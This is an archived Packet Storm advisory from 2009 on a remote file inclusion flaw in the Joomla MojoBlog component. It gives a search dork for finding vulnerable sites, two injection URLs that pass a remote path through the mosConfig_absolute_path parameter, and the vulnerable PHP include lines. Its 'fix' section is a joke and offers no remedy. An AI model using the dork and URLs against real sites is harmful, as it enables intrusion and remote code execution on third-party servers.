Joomla! MojoBlog Remote File Inclusion

2009-12-01T00:00:00
ID PACKETSTORM:83344
Type packetstorm
Reporter kaMtiEz
Modified 2009-12-01T00:00:00

Description

                                        
                                            `#########################################################################  
## Joomla Component MojoBlog Multiple Remote File Include vulnerability #  
## Author : kaMtiEz (kamzcrew@yahoo.com) #  
## Homepage : http://www.indonesiancoder.com #  
## Date : November 20, 2009 #  
#########################################################################  
  
[ Software Information ]  
  
[+] Vendor : http://www.joomlify.com/  
[+] Download : http://www.joomlify.com/files/mojoblog/  
[+] version : RC0.15  
[+] Vulnerability : RFI  
[+] price : FREE   
[+] Dork : inurl:"com_mojo"  
[+] Location : INDONESIA - JOGJA  
  
#########################################################################  
  
[ Vulnerable File ]  
  
http://127.0.0.1/components/com_mojo/wp-comments-post.php?mosConfig_absolute_path=[INDONESIANCODER-Ev1L]  
  
http://127.0.0.1/components/com_mojo/wp-trackback.php?mosConfig_absolute_path=[INDONESIANCODER-Ev1L]  
  
[ BUG IN ]  
  
[1] wp-comments-post.php  
  
[2] wp-trackback.php  
======================  
  
[1] require_once($mosConfig_absolute_path.'/components/com_mojo/wp-config.php');   
  
[2] require_once($mosConfig_absolute_path.'/components/com_mojo/wp-config.php');   
  
[ FIX ]  
  
contact me .. or aurakasih ..  
  
Joke.. ;)  
#########################################################################  
  
[ Thx TO ]  
  
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW  
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h  
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz  
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy and YOU!!  
  
[ NOTE ]   
  
[+] one day .. u will be mind ..  
[+] bangun tidur coba mencari celah .. dapet juga ,, :D  
[+] aurakasih .. aku butuh kamuwh .. hha  
[+] om tukulesto kapan ke kotaku ?? hha  
`